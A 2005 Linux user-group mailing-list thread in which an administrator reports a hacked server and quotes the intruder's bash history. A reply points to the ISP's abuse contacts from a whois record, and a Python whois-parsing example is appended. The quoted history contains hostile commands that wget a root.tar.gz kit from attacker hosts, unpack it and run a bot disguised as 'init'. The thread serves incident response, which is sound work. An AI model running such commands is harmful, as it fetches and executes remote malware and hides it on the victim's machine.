[wellylug] Think I've had a server hacked
Jamie Baddeley
wellylug at vpc.co.nz
Wed Oct 26 22:49:06 NZDT 2005
At the very least you should try this:
% Information related to '82.123.175.0 - 82.123.175.255'
inetnum: 82.123.175.0 - 82.123.175.255
netname: IP2000-ADSL-BAS
descr: BSTUI152 Tuileries Bloc2
country: FR
admin-c: WITR1-RIPE
tech-c: WITR1-RIPE
status: ASSIGNED PA
remarks: for hacking, spamming or security problems send mail to
remarks: postmaster at wanadoo.fr AND abuse at wanadoo.fr
mnt-by: FT-BRX
source: RIPE # Filtered
send them mail. Yes, 82.123.175.245 may simply be a compromised jump
point, but it costs nothing to let them know.
jamie
On Wed, 2005-10-26 at 10:25 +1300, Mark Signal wrote:
> Hi
>
> I set up a box ages ago for a client - redhat 7.2/Mitel with only ssh port
> open
>
> root password just got changed and /var/log/auth deleted
> last login from 82.123.175.245 (somewhere in europe - normally only
> connections from Lower Hutt :)
> root bash history has..
> w
> passwd
> uname -a
> ps x
> w
> cd /var/tmp
> ls
> wget hash.idilis.ro/root.tar.gz
> wget 217.156.85.3/root.tar.gz
> fr hash.idilis.ro
> ftp hash.idilis.ro
> ftp 217.156.85.3
> tar xzvf mech*
> cd mech
> mv bash init
> PATH=:.PATH
> init
> init
> init
>
> I am copying all the data off (including /var/logs/) and will
> reinstall/update and shift ssh port
>
> is there anything else I can/should do?
>
> cheers
>
>
> Mark
--
Jamie Baddeley <wellylug at vpc.co.nz>
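Turning the lookup Jamie suggests into a repeatable step, as an added example that is not part of this thread: the Python below parses a RIPE-style whois record, de-obfuscates the "user at domain" contacts written in its remarks lines (and also picks up an abuse-mailbox attribute where a newer record carries one), and checks that the offending address actually falls inside the record's inetnum before you write to those contacts. The whois text is a constructed sample copied from the record quoted above; the function names are my own.

```python
import ipaddress
import re

# Constructed sample: the RIPE record quoted in the reply above, as pasted text.
WHOIS_TEXT = """\
% Information related to '82.123.175.0 - 82.123.175.255'
inetnum:        82.123.175.0 - 82.123.175.255
netname:        IP2000-ADSL-BAS
descr:          BSTUI152 Tuileries Bloc2
country:        FR
admin-c:        WITR1-RIPE
tech-c:         WITR1-RIPE
status:         ASSIGNED PA
remarks:        for hacking, spamming or security problems send mail to
remarks:        postmaster at wanadoo.fr AND abuse at wanadoo.fr
mnt-by:         FT-BRX
source:         RIPE # Filtered
"""

# "postmaster at wanadoo.fr" style addresses, and ordinary user@domain ones.
OBFUSCATED_MAIL = re.compile(r"\b([\w.+-]+)\s+at\s+([\w-]+(?:\.[\w-]+)+)\b", re.I)
PLAIN_MAIL = re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b")

def parse_whois(text):
    """Map attribute -> list of values; '%' comment lines are skipped and
    repeated attributes such as 'remarks' keep every value in order."""
    record = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("%"):
            continue
        key, sep, value = line.partition(":")
        if sep:
            record.setdefault(key.strip(), []).append(value.strip())
    return record

def abuse_contacts(record):
    """Addresses to notify, from abuse-mailbox and from remarks lines."""
    found = []
    for value in record.get("abuse-mailbox", []) + record.get("remarks", []):
        found.extend(PLAIN_MAIL.findall(value))
        found.extend(f"{user}@{domain}" for user, domain in OBFUSCATED_MAIL.findall(value))
    return list(dict.fromkeys(a.lower() for a in found))  # dedupe, keep order

def ip_in_inetnum(ip, inetnum):
    """True if ip lies within a 'lo - hi' inetnum range."""
    lo, _, hi = (p.strip() for p in inetnum.partition("-"))
    return ipaddress.ip_address(lo) <= ipaddress.ip_address(ip) <= ipaddress.ip_address(hi)

def abuse_report(ip, text):
    """Summarise who to contact about ip, refusing a record that does not cover it."""
    rec = parse_whois(text)
    inetnum = rec.get("inetnum", [""])[0]
    if not inetnum or not ip_in_inetnum(ip, inetnum):
        raise ValueError(f"{ip} is not covered by record {inetnum!r}")
    return {"ip": ip, "inetnum": inetnum, "netname": rec.get("netname", [""])[0],
            "country": rec.get("country", [""])[0], "contacts": abuse_contacts(rec)}
```

Feed it the output of `whois <ip>` for the source address from your own logs; the contacts list is what goes in the To: line of the abuse report, with the relevant log lines (timestamps in UTC) attached.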